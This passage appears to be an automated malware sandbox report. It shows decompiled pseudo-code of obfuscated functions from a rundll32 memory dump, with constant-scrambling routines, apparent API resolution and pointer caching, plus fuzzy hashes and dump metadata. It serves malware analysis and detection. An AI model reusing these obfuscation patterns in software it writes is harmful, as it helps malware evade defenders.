				_v40 = 0x6155;
				_v40 = _v40 >> 0xb;
				_v40 = _v40 * 0x3b;
				_v40 = _v40 ^ 0x00001994;
				_v20 = 0xb711;
				_v20 = _v20 >> 7;
				_v20 = _v20 * 0x78;
				_v20 = _v20 >> 0xe;
				_v20 = _v20 ^ 0x00000d9d;
				E0043FEE3(_a4,  &_v152, _v48, _v12, _v16, _v44);
				_t117 = E0043F914(_v24, _v28, _t164, _v36,  &_v72, _v32, _t150);
				_t163 = _t161 + 0x2c;
				while(_t117 != 0) {
					__eflags = E0043BE74(_v40,  &_v64, _v20,  &_v72);
					if(__eflags != 0) {
						_t123 = _v60 - 1;
						__eflags = _t123;
						if(_t123 == 0) {
							E00443F4F(_v64,  &_v56);
						} else {
							_t125 = _t123 - 1;
							__eflags = _t125;
							if(_t125 == 0) {
								E0043240F(_v64,  &_v56);
							} else {
								_t127 = _t125 - 1;
								__eflags = _t127;
								if(_t127 == 0) {
									E0044D70B(_v64,  &_v56);
								} else {
									_t129 = _t127 - 1;
									__eflags = _t129;
									if(_t129 == 0) {
										E0043ADAF(_v64,  &_v56);
									} else {
										_t131 = _t129 - 6;
										__eflags = _t131;
										if(_t131 == 0) {
											E0044BBF1(_v64,  &_v56);
										} else {
											__eflags = _t131 == 1;
											if(_t131 == 1) {
												E00446BE4(_v64,  &_v56);
											}
										}
									}
								}
							}
						}
						_t160 = _t160 + 1;
						__eflags = _t160;
					}
					_t117 = E0043F914(_v24, _v28, __eflags, _v36,  &_v72, _v32,  &_v152);
					_t163 = _t163 + 0x10;
				}
				return _t160;
			}

0x00442fa1
0x00442fab
0x00442fae
0x00442faf
0x00442fb0
0x00442fb5
0x00442fbc
0x00442fc2
0x00442fc9
0x00442fcb
0x00442fd5
0x00442fd8
0x00442fdf
0x00442fe6
0x00442fed
0x00442ff4
0x00442ffb
0x00442fff
0x00443006
0x0044300d
0x00443014
0x0044301b
0x0044301f
0x00443026
0x0044302d
0x00443034
0x0044303b
0x00443042
0x00443049
0x00443050
0x00443057
0x0044305e
0x00443062
0x00443065
0x0044306c
0x00443073
0x0044307a
0x00443081
0x00443088
0x0044308f
0x00443096
0x0044309a
0x004430a1
0x004430a8
0x004430b3
0x004430b6
0x004430bd
0x004430c4
0x004430cc
0x004430cf
0x004430d3
0x004430e6
0x004430fe
0x00443103
0x004431a6
0x0044311f
0x00443121
0x00443126
0x00443126
0x00443127
0x00443181
0x00443129
0x00443129
0x00443129
0x0044312a
0x00443174
0x0044312c
0x0044312c
0x0044312c
0x0044312d
0x00443167
0x0044312f
0x0044312f
0x0044312f
0x00443130
0x0044315a
0x00443132
0x00443132
0x00443132
0x00443135
0x0044314d
0x00443137
0x00443137
0x00443138
0x00443140
0x00443140
0x00443138
0x00443135
0x00443130
0x0044312d
0x0044312a
0x00443186
0x00443186
0x00443186
0x0044319e
0x004431a3
0x004431a3
0x004431b4

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 798dcc80f28f754ef4a8133266f197d27c7fe18b7239adb6d2b86fb99832f5cb
Instruction ID: e39c2674ccda0672e00a68143a55b4556d33ca5030eee37b8002222494042f5d
Opcode Fuzzy Hash: 798dcc80f28f754ef4a8133266f197d27c7fe18b7239adb6d2b86fb99832f5cb
Instruction Fuzzy Hash: 11512571C0021EABEF08DFA5D9468EEBBB5FF44708F20851AE511B6260D7785B05CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00182515, Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7070687d6ceda5e5642993e06f2153beae939ad7cb8a2d3d8133440fa5b476b5
Instruction ID: eaa9ed4b2da01b6c93d35a6598edce9be867df04f5e17d2f2dac2e99dc0208a4
Opcode Fuzzy Hash: 7070687d6ceda5e5642993e06f2153beae939ad7cb8a2d3d8133440fa5b476b5
Instruction Fuzzy Hash: A3510371C0021EABDF09EFA4D94A8EEBBB6FF54304F648118E812B6264E7755B05CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0043A525, Relevance: .1, Instructions: 114
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E0043A525(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				void* _t124;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				void* _t148;

				_push(_a12);
				_push(_a8);
				_v48 = 0x104;
				_push(_a4);
				_push(__edx);
				_push(0x104);
				E00442550(0x104);
				_v8 = 0x5228;
				_t148 = 0;
				_t129 = 0x75;
				_v8 = _v8 / _t129;
				_t130 = 0x18;
				_v8 = _v8 / _t130;
				_v8 = _v8 + 0x75ec;
				_v8 = _v8 ^ 0x00006735;
				_v24 = 0x3444;
				_v24 = _v24 | 0x67f8f53e;
				_v24 = _v24 >> 0xf;
				_v24 = _v24 ^ 0x00009a34;
				_v16 = 0xef12;
				_v16 = _v16 >> 7;
				_t131 = 0x4c;
				_v16 = _v16 * 0x61;
				_v16 = _v16 + 0x9bb9;
				_v16 = _v16 ^ 0x00012294;
				_v44 = 0xb0ea;
				_v44 = _v44 + 0xffff7f2b;
				_v44 = _v44 ^ 0x00003439;
				_v28 = 0xbc68;
				_v28 = _v28 << 2;
				_v28 = _v28 ^ 0x0b04eabb;
				_v28 = _v28 ^ 0x0b06595b;
				_v40 = 0x8c64;
				_v40 = _v40 * 5;
				_v40 = _v40 + 0x4c62;
				_v40 = _v40 ^ 0x00036b68;
				_v36 = 0xe385;
				_v36 = _v36 << 7;
				_t132 = 5;
				_v36 = _v36 / _t131;
				_v36 = _v36 ^ 0x000154a9;
				_v20 = 0xd5bf;
				_v20 = _v20 + 0x3bce;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 | 0xfc33a738;
				_v20 = _v20 ^ 0xfc33f58d;
				_v32 = 0xac74;
				_v32 = _v32 << 0xf;
				_v32 = _v32 / _t132;
				_v32 = _v32 ^ 0x113ecb06;
				_v12 = 0x99c5;
				_v12 = _v12 << 0xa;
				_v12 = _v12 >> 7;
				_v12 = _v12 | 0x7a8586f5;
				_v12 = _v12 ^ 0x7a85defd;
				_t124 = E00443358(_t132, _v12, _t132, _t132, _a8);
				_t147 = _t124;
				if(_t124 != 0) {
					_push(_t132);
					_t148 = E00441B9D(_v16, _v44, _a4, _v28, _t147,  &_v48);
					E0043F1ED(_v40, _v36, _v20, _v32, _t147);
				}
				return _t148;
			}

0x0043a52d
0x0043a535
0x0043a538
0x0043a53b
0x0043a53e
0x0043a53f
0x0043a540
0x0043a545
0x0043a554
0x0043a558
0x0043a55d
0x0043a565
0x0043a56a
0x0043a56f
0x0043a576
0x0043a57d
0x0043a584
0x0043a58b
0x0043a58f
0x0043a596
0x0043a59d
0x0043a5a5
0x0043a5a8
0x0043a5ab
0x0043a5b2
0x0043a5b9
0x0043a5c0
0x0043a5c7
0x0043a5ce
0x0043a5d5
0x0043a5d9
0x0043a5e0
0x0043a5e7
0x0043a5f2
0x0043a5f5
0x0043a5fc
0x0043a603
0x0043a60a
0x0043a613
0x0043a614
0x0043a619
0x0043a620
0x0043a627
0x0043a62e
0x0043a632
0x0043a639
0x0043a640
0x0043a647
0x0043a653
0x0043a656
0x0043a65d
0x0043a664
0x0043a668
0x0043a66c
0x0043a673
0x0043a685
0x0043a68a
0x0043a691
0x0043a693
0x0043a6ae
0x0043a6b9
0x0043a6be
0x0043a6c8

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bbadcc866d8b4040baa0a8c8f4469103875442558c010708b315e9b0989b624
Instruction ID: 4a8b0469ee61e27c5da198a7b71b2c6218bf9172fffa42ecfcbb52c11caab333
Opcode Fuzzy Hash: 2bbadcc866d8b4040baa0a8c8f4469103875442558c010708b315e9b0989b624
Instruction Fuzzy Hash: 7C510571D0020DEBEF09CFE5C94A8DEBBB5EB48318F208159E414B6290D7B95B55CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00179A99, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 131e7aa17b19979d871cdb98180a0e79ec1912da9ff08fe787abe98a1c671a6b
Instruction ID: 5ce3d3591d2d029e6a6bed61e59d13717165f26468deb877e4610572f9842a2e
Opcode Fuzzy Hash: 131e7aa17b19979d871cdb98180a0e79ec1912da9ff08fe787abe98a1c671a6b
Instruction Fuzzy Hash: 13510571D00209EBEF09CFE5C94A8DEBBF5EB48318F208159E514B6290D7B95B49CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0043A6C9, Relevance: .1, Instructions: 90
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E0043A6C9(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				char _v560;
				intOrPtr* _t92;

				_v40 = 0;
				_v8 = 0xf494;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 >> 4;
				_v8 = _v8 | 0xf278016b;
				_v8 = _v8 ^ 0xf2787422;
				_v24 = 0xcf3b;
				_v24 = _v24 + 0xffff718a;
				_push(0x48);
				_pop(0);
				_v24 = _v24 / 0;
				_v24 = _v24 ^ 0x00007af7;
				_v32 = 0xe834;
				_v32 = _v32 + 0x185d;
				_v32 = _v32 >> 4;
				_v32 = _v32 ^ 0x000037bf;
				_v20 = 0xef96;
				_v20 = _v20 + 0xffffdb9a;
				_v20 = _v20 * 0x73;
				_v20 = _v20 ^ 0x005b1c49;
				_v36 = 0x968d;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x000009ee;
				_v28 = 0x17aa;
				_v28 = _v28 / 0;
				_v28 = _v28 * 0x3a;
				_v28 = _v28 ^ 0x00000fdd;
				_v12 = 0xb689;
				_v12 = _v12 * 0x6c;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0x00007e37;
				_v16 = 0xc92d;
				_v16 = _v16 >> 5;
				_v16 = _v16 | 0xe8c7394a;
				_v16 = _v16 ^ 0xe8c76f48;
				if(E0043C931( &_v560, _v8, _v24, _v32) != 0) {
					_t92 =  &_v560;
					if(_v560 != 0) {
						while( *_t92 != 0x5c) {
							_t92 = _t92 + 2;
							if( *_t92 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						 *((short*)(_t92 + 2)) = 0;
					}
					L6:
					E0044E0AF(0, _v20, 0, _v36, 0,  &_v40, _v28, 0,  &_v560, 0, _v12, 0, _v16);
				}
				return _v40;
			}

0x0043a6d7
0x0043a6da
0x0043a6e1
0x0043a6e5
0x0043a6e9
0x0043a6f0
0x0043a6f7
0x0043a6fe
0x0043a708
0x0043a70a
0x0043a70f
0x0043a712
0x0043a719
0x0043a720
0x0043a727
0x0043a72b
0x0043a732
0x0043a739
0x0043a744
0x0043a747
0x0043a74e
0x0043a755
0x0043a759
0x0043a760
0x0043a772
0x0043a779
0x0043a77c
0x0043a783
0x0043a78e
0x0043a791
0x0043a795
0x0043a798
0x0043a79f
0x0043a7a6
0x0043a7aa
0x0043a7b1
0x0043a7cb
0x0043a7cd
0x0043a7da
0x0043a7dc
0x0043a7e2
0x0043a7e8
0x00000000
0x00000000
0x0043a7ea
0x00000000
0x0043a7e8
0x0043a7ee
0x0043a7ee
0x0043a7f2
0x0043a811
0x0043a816
0x0043a820

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0ed3f14480d6fb85cf8ede8ed01864779f7b807295fd40e7721b35f462d89f7
Instruction ID: b5d8bb9d9d281d19f70819a30516c536d12d9dfaf4953373530e30b91b99424e
Opcode Fuzzy Hash: d0ed3f14480d6fb85cf8ede8ed01864779f7b807295fd40e7721b35f462d89f7
Instruction Fuzzy Hash: 2941E472C0021EABDF19CFA1C94A9EEBBB5FB08304F208199D014B6290D3B95B59CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00179C3D, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0ed3f14480d6fb85cf8ede8ed01864779f7b807295fd40e7721b35f462d89f7
Instruction ID: 4736fd189c6f6f5518d785fc5a9aec11ff2b97b86d26f17d14af4a7088b2a45a
Opcode Fuzzy Hash: d0ed3f14480d6fb85cf8ede8ed01864779f7b807295fd40e7721b35f462d89f7
Instruction Fuzzy Hash: 6141E272C0020EABDF19CFE1C94A9EEBBB5FB04304F208199D014B61A0E3B95B59CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0044D4E1, Relevance: .1, Instructions: 87
COMMONCrypto

Download Yara Rule

C-Code - Quality: 28%

			E0044D4E1(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				signed int _t103;
				signed int _t107;
				signed int _t108;
				signed int _t109;
				void* _t117;
				void* _t118;
				signed int _t119;
				void* _t122;

				_t122 = __eflags;
				_v8 = 0x9d48;
				_v8 = _v8 << 0xa;
				_t118 = __ecx;
				_t107 = 0xc;
				_v8 = _v8 / _t107;
				_v8 = _v8 ^ 0x84a8c1f7;
				_v8 = _v8 ^ 0x849ce678;
				_v16 = 0x4884;
				_v16 = _v16 + 0xfffff3b9;
				_v16 = _v16 ^ 0x6bddc2ef;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 ^ 0x0000e0dc;
				_v12 = 0x1ff1;
				_t108 = 0x5e;
				_v12 = _v12 * 0x6e;
				_v12 = _v12 << 0xe;
				_v12 = _v12 * 0xd;
				_v12 = _v12 ^ 0x9b0dd4a2;
				_v28 = 0x87c6;
				_v28 = _v28 + 0xffff61ee;
				_v28 = _v28 / _t108;
				_v28 = _v28 ^ 0x02b97512;
				_v24 = 0x2da2;
				_v24 = _v24 + 0xffff2827;
				_v24 = _v24 + 0xffff9d22;
				_v24 = _v24 ^ 0xfffeb986;
				_v20 = 0x7758;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 | 0x0ba9e341;
				_v20 = _v20 ^ 0x0ba99bf4;
				_v36 = 0x8619;
				_v36 = _v36 ^ 0x2bac5130;
				_v36 = _v36 ^ 0x2bac97af;
				_v40 = E0043A156();
				_v32 = 0x8f7a;
				_t109 = 0x71;
				_v32 = _v32 / _t109;
				_v32 = _v32 ^ 0x00000141;
				_v8 = 0xc831;
				_v8 = _v8 + 0xffffeaea;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x00002cd6;
				_t103 = E0043DF8A(_t109, _v32 % _t109, _t122, _v8, _v32);
				_push(_v36);
				_t119 = _t103;
				_push(_v20);
				_push(_v24);
				_push(_t118);
				_push(_t119);
				_push(_v28);
				_t117 = 3;
				E00449A27( &_v40, _t117);
				 *((short*)(_t118 + _t119 * 2)) = 0;
				return 0;
			}

0x0044d4e1
0x0044d4e7
0x0044d4f0
0x0044d4fb
0x0044d4fd
0x0044d502
0x0044d507
0x0044d50e
0x0044d515
0x0044d51c
0x0044d523
0x0044d52a
0x0044d52e
0x0044d535
0x0044d540
0x0044d541
0x0044d544
0x0044d54c
0x0044d54f
0x0044d556
0x0044d55d
0x0044d569
0x0044d56c
0x0044d573
0x0044d57a
0x0044d581
0x0044d588
0x0044d58f
0x0044d596
0x0044d59a
0x0044d5a1
0x0044d5a8
0x0044d5af
0x0044d5b6
0x0044d5c5
0x0044d5ca
0x0044d5d6
0x0044d5d9
0x0044d5dc
0x0044d5e3
0x0044d5ea
0x0044d5f1
0x0044d5f5
0x0044d608
0x0044d60d
0x0044d610
0x0044d615
0x0044d618
0x0044d61b
0x0044d61c
0x0044d61d
0x0044d622
0x0044d623
0x0044d62d
0x0044d636

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a434f546294ff16000c075816f5c378907933f48be170b95346e54a9c6ecf090
Instruction ID: 67df9df35e974741f94f9427e15cc293baabbdff808375c3fdb1573d6dad21b4
Opcode Fuzzy Hash: a434f546294ff16000c075816f5c378907933f48be170b95346e54a9c6ecf090
Instruction Fuzzy Hash: B4411372D0120AEBDF08CFE5D94A9DEBBB1FB44304F208199E111BA2A0D7B94B55DF84

Uniqueness

Uniqueness Score: -1.00%

Function 0018CA55, Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a434f546294ff16000c075816f5c378907933f48be170b95346e54a9c6ecf090
Instruction ID: f59ff623aa9f3a79674625591d1d055bc04a311365bfa6f600cfbdc6cbfdc9a3
Opcode Fuzzy Hash: a434f546294ff16000c075816f5c378907933f48be170b95346e54a9c6ecf090
Instruction Fuzzy Hash: 5A411572D0120AEBDF08CFE5D94A9DEBBB1FB44304F208199E215BA1A0D7B94B55DF80

Uniqueness

Uniqueness Score: -1.00%

Function 00440B8A, Relevance: .1, Instructions: 74
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E00440B8A(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _t100;
				signed int _t101;

				_v36 = 0x5aa;
				_v36 = _v36 >> 0x10;
				_v36 = _v36 ^ 0x0000330c;
				_v32 = 0xdf00;
				_v32 = _v32 | 0xab132c2b;
				_v32 = _v32 ^ 0xab13f0c0;
				_v8 = 0x63ed;
				_t100 = __edx;
				_v8 = _v8 * 0x4e;
				_v8 = _v8 ^ 0xf2c24d67;
				_v8 = _v8 ^ 0x1b3721e6;
				_v8 = _v8 ^ 0xe9eb1c06;
				_v24 = 0xe288;
				_v24 = _v24 + 0xbb54;
				_v24 = _v24 + 0xdb0d;
				_v24 = _v24 ^ 0x00023210;
				_v40 = 0x5eed;
				_v40 = _v40 + 0xffff6eb1;
				_v40 = _v40 ^ 0xfffff76e;
				_v12 = 0x6942;
				_v12 = _v12 << 0xe;
				_v12 = _v12 >> 4;
				_t101 = 0xb;
				_push(__ecx);
				_v12 = _v12 / _t101;
				_v12 = _v12 ^ 0x00267602;
				_v28 = 0x620d;
				_v28 = _v28 + 0xffff96d2;
				_v28 = _v28 << 0xa;
				_v28 = _v28 ^ 0xffe35567;
				_v20 = 0x2a57;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x7bcf801d;
				_v20 = _v20 * 0x1d;
				_v20 = _v20 ^ 0x05537e8d;
				_v16 = 0x5dcb;
				_v16 = _v16 << 0xb;
				_v16 = _v16 | 0x4e4aa2fe;
				_v16 = _v16 + 0x15cc;
				_v16 = _v16 ^ 0x4eef698c;
				_push(_v24);
				_push(_v8);
				 *((intOrPtr*)( *0x451080 + 0x1c + _t100 * 4)) = E004449CF(_v40, _v12, E00435DFC(_v36, _v32, _v16));
				return E00440D6D(_v28, _v20, _v16, _t86);
			}

0x00440b90
0x00440b97
0x00440b9b
0x00440ba2
0x00440ba9
0x00440bb0
0x00440bb7
0x00440bc6
0x00440bca
0x00440bcd
0x00440bd4
0x00440bdb
0x00440be2
0x00440be9
0x00440bf0
0x00440bf7
0x00440bfe
0x00440c05
0x00440c0c
0x00440c13
0x00440c1a
0x00440c1e
0x00440c25
0x00440c28
0x00440c29
0x00440c2c
0x00440c33
0x00440c3a
0x00440c41
0x00440c45
0x00440c4c
0x00440c53
0x00440c57
0x00440c62
0x00440c65
0x00440c6c
0x00440c73
0x00440c77
0x00440c7e
0x00440c85
0x00440c8c
0x00440c8f
0x00440cb8
0x00440ccc

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e0b5afeeb7bd09da4e5db9bcbf22189250f46ba64c8faf4f919ef705d134ccd
Instruction ID: ad6ca70c513d874df391a87008da20420be34d434b5b7c5c4a1b4d5758832b6f
Opcode Fuzzy Hash: 6e0b5afeeb7bd09da4e5db9bcbf22189250f46ba64c8faf4f919ef705d134ccd
Instruction Fuzzy Hash: DF3111B1C0021AEBDF18CFA5C94A4DEBBB1FB44314F208199C122B72A0D7B94B05CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001800FE, Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c95661d2484b6314445495ddb305d22a50364b520d0b0d89c1b5f7c49ec30cd5
Instruction ID: 2c9247639c29b49038201b4c49a6b204b23e269dcb8220bc4cbfbc1bab1798ca
Opcode Fuzzy Hash: c95661d2484b6314445495ddb305d22a50364b520d0b0d89c1b5f7c49ec30cd5
Instruction Fuzzy Hash: 3331F171C0061AEBDF58DFA5C94A4DEBBB1FB44314F208199C122B72A0D7B94B45CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00437378, Relevance: .1, Instructions: 73
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E00437378(intOrPtr _a8, intOrPtr _a16, signed int _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _v48;
				intOrPtr _v52;
				void* _t84;
				signed int _t86;
				signed int _t92;

				_v52 = 0x16987;
				_t92 = _a20;
				asm("stosd");
				_t86 = 0x19;
				asm("stosd");
				asm("stosd");
				_v32 = 0xbca3;
				_v32 = _v32 + 0xffa8;
				_v32 = _v32 ^ 0x0001b5a0;
				_v28 = 0x7499;
				_v28 = _v28 ^ 0x8b4212c4;
				_v28 = _v28 ^ 0x8b424b18;
				_v24 = 0x998c;
				_v24 = _v24 + 0xffffcf68;
				_v24 = _v24 ^ 0x0000327c;
				_v20 = 0xcacf;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x0032e4d9;
				_v36 = 0xb036;
				_v36 = _v36 * 0x6f;
				_v36 = _v36 ^ 0x004c1ab0;
				_v16 = 0xe7fa;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 * 0x72;
				_v16 = _v16 ^ 0x0000227a;
				_v12 = 0xf6b9;
				_v12 = _v12 | 0x229c8a7f;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x08e044b9;
				_v12 = _v12 ^ 0xf61f6f05;
				_v8 = 0xd627;
				_v8 = _v8 ^ 0xe545ff33;
				_v8 = _v8 / _t86;
				_v8 = _v8 | 0x013bd0a8;
				_v8 = _v8 ^ 0x093b8413;
				if( *((intOrPtr*)(0x450408 + _t92 * 4)) == 0) {
					_push(_t86);
					_push(_t86);
					_t84 = E00440223(_a16);
					_push(_a8);
					_push(_v8);
					_push(_v12);
					_push(_v16);
					 *((intOrPtr*)(0x450408 + _t92 * 4)) = E0044C4DD(_v36, _t84);
				}
				return  *((intOrPtr*)(0x450408 + _t92 * 4));
			}

0x0043737e
0x0043738c
0x0043738f
0x00437394
0x00437395
0x00437396
0x00437397
0x0043739e
0x004373a5
0x004373ac
0x004373b3
0x004373ba
0x004373c1
0x004373c8
0x004373cf
0x004373d6
0x004373dd
0x004373e1
0x004373e8
0x004373f3
0x004373f6
0x004373fd
0x00437404
0x0043740c
0x0043740f
0x00437416
0x0043741d
0x00437424
0x00437428
0x0043742f
0x00437436
0x0043743d
0x00437449
0x0043744c
0x00437453
0x00437462
0x00437470
0x00437471
0x00437475
0x0043747a
0x0043747f
0x00437482
0x00437485
0x00437493
0x00437493
0x004374a6

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b4b20397fe21f6b6cb4dc8e5c9ddbb6be4355ef3cd3a3fc784a3ded886bb054
Instruction ID: e4683a306c0f3daf04eb4b182d16bad64718d9c9ac4a331c44ffd568406c9eb8
Opcode Fuzzy Hash: 1b4b20397fe21f6b6cb4dc8e5c9ddbb6be4355ef3cd3a3fc784a3ded886bb054
Instruction Fuzzy Hash: FA311275D0021DEFEF44CFA5D94A4EEBBB4FB49308F108059E911B62A0C3B88A05DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00435418, Relevance: .1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E00435418(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t53;
				signed int _t66;
				signed int _t67;
				void* _t79;
				intOrPtr _t80;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00442550(_t53);
				_v32 = 0x6749d6;
				_t80 = 0;
				_v28 = 0;
				_v24 = 0;
				_v16 = 0xfeb6;
				_v16 = _v16 ^ 0x1a3a87a5;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x068ee483;
				_v12 = 0xf4bf;
				_v12 = _v12 << 5;
				_v12 = _v12 >> 6;
				_v12 = _v12 ^ 0x00001984;
				_v20 = 0x5159;
				_v20 = _v20 >> 0xa;
				_v20 = _v20 ^ 0x00003ebb;
				_v8 = 0x7bf9;
				_t66 = 0x7e;
				_v8 = _v8 / _t66;
				_v8 = _v8 ^ 0xf75420d9;
				_t67 = 0x73;
				_v8 = _v8 / _t67;
				_v8 = _v8 ^ 0x0226967d;
				_t79 = E004354FB(0x40000);
				if(_t79 != 0) {
					_push(_t79);
					_push(_a4);
					_push(_a20);
					_t80 = E004416E0(_a12, _a16);
					E0043DE81(_v20, _t79, _v8);
				}
				return _t80;
			}

0x00435420
0x00435423
0x00435426
0x00435429
0x0043542c
0x0043542f
0x00435430
0x00435431
0x00435436
0x0043543d
0x0043543f
0x00435444
0x00435447
0x0043544e
0x00435455
0x00435459
0x00435460
0x00435467
0x0043546b
0x0043546f
0x00435476
0x0043547d
0x00435481
0x00435488
0x00435494
0x00435499
0x0043549e
0x004354a8
0x004354b3
0x004354b6
0x004354c8
0x004354cd
0x004354d5
0x004354d6
0x004354d9
0x004354e9
0x004354eb
0x004354f0
0x004354fa

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
